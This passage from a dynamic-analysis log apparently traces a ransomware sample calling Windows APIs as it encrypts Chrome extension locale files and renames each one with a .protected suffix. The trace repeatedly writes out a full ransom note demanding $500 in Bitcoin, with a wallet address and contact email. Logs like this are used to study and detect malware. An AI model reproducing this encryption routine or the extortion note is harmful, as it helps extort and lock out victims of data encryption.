returned -1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0079.421] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.421] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.421] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.421] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0079.422] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0079.422] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0079.422] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.422] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf2, lpOverlapped=0x0) returned 1 [0079.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.423] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf2, lpOverlapped=0x0) returned 1 [0079.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.423] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.423] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.423] CloseHandle (hObject=0x168) returned 1 [0079.424] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.protected") returned 166 [0079.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.protected")) returned 1 [0079.424] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.424] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.424] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\RESTORE_FILES.txt") returned 160 [0079.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.425] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.425] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.426] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.426] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.426] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.426] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.426] CloseHandle (hObject=0x164) returned 1 [0079.426] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.426] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0079.426] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0079.426] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0079.426] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0079.426] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0079.426] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no") returned 142 [0079.426] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0079.426] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0079.426] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\*") returned 144 [0079.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.427] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.427] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.427] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.427] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\.") returned 144 [0079.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.427] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.427] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.427] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 
[0079.427] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.427] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\..") returned 145 [0079.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.427] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0079.427] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.427] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.427] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.427] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0079.428] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0079.429] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.429] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0079.429] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.429] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.429] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.430] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xda, lpOverlapped=0x0) returned 1 
[0079.430] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.430] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.430] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.430] CloseHandle (hObject=0x168) returned 1 [0079.430] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.protected") returned 166 [0079.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.protected")) returned 1 [0079.431] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.431] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.431] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\RESTORE_FILES.txt") returned 160 [0079.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.432] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.432] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.432] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.432] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.433] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.433] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.433] CloseHandle (hObject=0x164) returned 1 [0079.433] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0079.433] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl") returned 142 [0079.433] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0079.433] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0079.433] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\*") returned 144 [0079.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.433] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.433] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.433] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.433] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.434] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.434] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\.") returned 144 [0079.434] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.434] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.434] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.434] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.434] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.434] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.434] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.434] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\..") returned 145 [0079.434] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.434] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.434] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.434] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.434] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0079.434] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.434] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.434] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: 